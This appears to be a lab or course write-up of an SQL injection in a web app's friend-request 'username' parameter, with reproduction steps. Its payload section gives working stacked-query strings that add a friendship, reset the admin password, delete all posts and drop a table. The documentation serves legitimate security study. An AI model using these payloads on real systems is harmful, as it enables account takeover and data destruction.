# Vulnerability 1: SQL injection in parameter `username`

- Vulnerability: SQL injection
- Where: `username` parameter of request_friend
- Impact: Allows execution of any query on the database, in the POC we will become friends with the user `ssofadmin`

## Steps to reproduce

1. Register a user with `username`=`test` and `password`=`testing`
2. In request_friends insert `username` = `'; INSERT INTO Friends(username1, username2) VALUES ('test', 'ssofadmin'); DROP table posts # `, the server should respond with "Internal Error" (in place of `ssofadmin` you can place any other existing username different from yours)
3. Go to `/friends` and verify that you are friends with the user `ssofadmin`

[(POC)](vuln1.py)

**Note:** The last instruction of the payload `DROP table posts` is needed for the query to be executed but is not actually performed by the database because table `posts` doesn't exist

## Other Payloads:
Examples of queries of each type:
- UPDATE query: `username`=`'; UPDATE Users SET password='a' WHERE username='ssofadmin'; DROP table posts # ` (change password of user `ssofadmin` to `a`, exemplified in [register #2](../register_vulns/vuln2.md)
- DELETE query: `username`=`'; DELETE FROM Posts; DROP table posts # ` (deletes all entries for table Posts), exemplified with similar payload in [register #3](../register_vulns/vuln3.md)
- DROP query: `username`=`'; DROP table Posts; DROP table posts # `(drops table Posts), exemplified in [pending_requests #1](../pending_requests_vulns/vuln1.md))
